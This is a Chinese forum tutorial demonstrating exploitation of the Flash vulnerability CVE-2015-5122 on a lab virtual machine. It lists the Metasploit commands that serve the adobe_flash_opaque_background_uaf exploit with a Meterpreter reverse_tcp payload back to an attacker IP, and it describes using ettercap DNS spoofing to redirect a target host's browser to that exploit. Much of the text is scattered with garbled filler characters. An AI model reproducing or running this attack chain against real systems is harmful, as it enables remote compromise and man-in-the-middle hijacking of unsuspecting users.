cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

3 {6 ?9 Z3 y# w; U/ z 二、cve2015-5122漏洞实例演示虚拟机 " r7 n! B3 P% Q: d6 S, \/ i

( N6 o& z" A- x u0 n) s, [3 ] 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： J9 w8 U* u5 M

8 i4 e/ U0 I" S' T3 ~" y8 n* n search cve-2015-5122如图： 2 [6 n( W: ^8 {. V& _ @& ?# k

0 C7 k U+ O! ~0 D& r* p( S ; E; v! N1 E1 A& y

+ P: ^$ @; O( I) A) u8 j 下面我们敲如下命令： / n0 O8 e1 @5 r6 q

( l, V2 [( y# t! w n- q use exploit/multi/browser/adobe_flash_opaque_background_uaf " v, X) H& u8 y/ E5 P$ o1 B4 v3 h! D

" P1 T& n1 b: h- Y set PAYLOAD windows/meterpreter/reverse_tcp ' P# O! q* t E

& `2 E" s, X$ z) f set LHOST 192.168.0.109 / a- E9 N( I2 c+ k

3 P( i( `/ y& W. E) O set URIPATH / /*根目录*/ : u1 p0 l9 B/ y8 c

+ B/ r# l1 \! i7 p. c1 U' y' D set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 3 w$ l2 O3 ~: q/ W4 z) z

8 C- Q0 `/ }: }" j' E4 O set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 . g& w; ?% D4 o3 y0 f$ e

" N4 _% u, a' F- P" @0 @# \- G+ g 然后show options如图： 9 S1 f2 y. ]) F2 \$ {4 O

# d0 E$ |) _8 ] }5 W& Q& { 7 @' U$ P- B5 a/ N6 C; T, l* j( l1 H3 W& q

3 S: O8 Z9 y0 r t/ g# k 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
% W8 ?8 u3 U8 O2 m8 W ( C' N5 s4 O: Y6 E z: z" L' O5 w9 K

$ J* O9 x+ i, g. j4 H 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ( Q. f& d: `3 s4 g" U6 i; v) ^

$ X3 _# n3 m# ?6 D: O Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf ; ~& A0 O! u: d0 o" I

+ g, D% N" {* M9 g 1 j% k4 i% }, s+ O6 t) f7 ]

- g0 z. E' S; ` 成功了，这时候我们断开ettercap，如图： ! e8 L# X5 n5 B4 |4 V

4 N+ |7 y @* a- C Y ' p, ?" L/ T0 Z; W& T) A

Screenshot如图： * d# C, H6 N* f7 t7 N% V

7 w) n* V! S7 U" s 6 @5 q v: e: f1 x" B U1 H U

3 P0 ~- ~6 e5 i3 C , G4 _+ U7 I) k. B

		自动登录	找回密码
密码			立即注册